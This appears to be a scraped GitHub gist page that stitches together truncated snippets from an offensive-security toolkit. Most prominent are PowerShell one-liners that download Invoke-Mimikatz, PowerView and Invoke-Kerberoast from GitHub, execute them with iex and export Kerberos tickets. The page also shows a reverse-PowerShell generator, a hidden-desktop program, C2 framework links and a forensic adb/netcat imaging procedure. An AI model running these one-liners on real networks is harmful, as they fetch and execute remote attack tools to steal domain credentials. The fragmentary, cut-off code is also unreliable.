I hereby claim:
- I am olivierlaflamme on github.
- I am olivierlaflamme (https://keybase.io/olivierlaflamme) on keybase.
- I have a public key ASCgiB3TsMKpS01EJ4ltypEUa8ZPzeCtdkxUIDweIzFfNgo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
ssh -L {LOCAL_PORT}:{HOST}:{REMOTE_PORT} {REMOTE_HOST} | |
Example | |
###ssh -L 3001:localhost:3001 username@host |
import json | |
filenames = [] | |
def findcred(dictionary): | |
for k, v in dictionary.items(): | |
if k == 'password' and dictionary['password']: | |
result = {} | |
if 'domainname' in dictionary: | |
result['domainname'] = dictionary['domainname'] |
# Invoke-Mimikatz.ps1 | |
$urls = @("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; $domain=((Get-WmiObject Win32_ComputerSystem).Domain); Add-Type -AssemblyName System.IdentityModel; iex $("setspn.exe -T $domain -Q */*") | Select-String '^CN' -Context 0,1 |% {New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim()}; Invoke-Mimikatz -Command "`"kerberos::list /export`"" | |
# Invoke-Kerberoast.ps1 | |
$urls = @("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast | |
# Invoke-Kerberoast.ps1 - Fix ':$ |
#define _GNU_SOURCE | |
#include <sched.h> | |
#include <unistd.h> | |
#include <stdlib.h> | |
#include <sys/wait.h> | |
#include <signal.h> | |
#include <fcntl.h> | |
#include <stdio.h> | |
#include <string.h> | |
#include <limits.h> |
#!/usr/bin/env python3 | |
# | |
# generate reverse powershell cmdline with base64 encoded args | |
# | |
import sys | |
import base64 | |
def help(): | |
print("USAGE: %s IP PORT" % sys.argv[0]) |
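# Android raw-storage acquisition over adb (forensic imaging).
# [host] steps run on the workstation; [device] steps are typed inside the
# adb shell. Pushing a binary and writing under /dev alters the device, so
# record these steps in the acquisition notes.

# [host] confirm the device is attached and authorized
adb devices
# [host] stage a netcat binary built for the device's architecture
adb push ./nc /sdcard/nc
# [host] map host TCP 4444 to device TCP 4444 over the adb transport
adb forward tcp:4444 tcp:4444
# [host] open a shell on the device; the next lines are entered there
adb shell
# [device] become root; reading the raw block device requires it
su
# [device] copy the binary off /sdcard (presumably because /sdcard does not
# permit execution; confirm on the target)
cp /sdcard/nc /dev/nc
# [device] owner-only execute is enough for root; 777 would let any local
# process overwrite the binary before it is run as root
chmod 700 /dev/nc
# [device] stream the whole storage device to a listener on port 4444.
# dd takes its block size as bs=N, and the binary lives at /dev/nc.
# The eMMC node is usually mmcblk0 but varies by device; check
# /proc/partitions first.
# The listener hands the image to the first client that connects, without
# authentication, so keep the device off Wi-Fi and cellular during acquisition.
dd if=/dev/block/mmcblk0 bs=65535 | /dev/nc -nvlp 4444
# [host, second terminal] pull the stream through the forwarded port
nc -nv 127.0.0.1 4444 > image.nand
# [host] record the hash of the received image. This shows the file has not
# changed since acquisition, not that the transfer was complete; compare the
# image size against the device size as well.
sha256sum image.nand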
// To compile: gcc64.exe run.c -o run.exe | |
// To run: run.exe cmd.exe "/c whoami" | |
#include <Windows.h> | |
#include <stdio.h> | |
int main(int argc, char **argv) { | |
CHAR cDesktop[] = "hiddendesktop"; | |
HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL); |
client.c | |
#include <Windows.h> | |
#include <stdio.h> | |
#define MAX_SIZE 1024 | |
int main(int argc, char **argv) { | |
CHAR *remotePipeName = (CHAR*)GlobalAlloc(GPTR, MAX_SIZE); | |
DWORD dwWritten = 0; |
https://raw.githubusercontent.com/FortyNorthSecurity/C2concealer/3630a87e56a1e36ea0d907903fc9b7460419e71f/C2concealer/components/postex.py | |
https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/Payload_Type/apollo/agent_code/Apollo/CommandModules/SpawnTo.cs | |
https://raw.githubusercontent.com/kphongagsorn/c2-profiles/29fe50eaad655ddd0028fca06a9c7785e3ffaf41/amazon.profile | |
https://raw.githubusercontent.com/MythicAgents/Apollo/49a8f4b8486a4cfd7cab5bf4ac0d457158f99606/documentation-payload/apollo/commands/spawnto_x64.md | |
https://raw.githubusercontent.com/TheRipperJhon/CAPE/2bc977577a8fcc81a46046fe5bf9248ed3ac0c28/modules/processing/parsers/malwareconfig/CobaltStrike.py | |
https://raw.githubusercontent.com/Tylous/SourcePoint/7bebe641d9c0d2dbc41c27ef621333f257cbd3e6/Struct/Struct.go | |
https://raw.githubusercontent.com/MythicAgents/Apollo/92958fc2c9511d738bc1cd2dd44405c650991014/documentation-payload/apollo/opsec.md | |
https://raw.githubusercontent.com/nsquar3/malware_analysis/e7f3070f4 |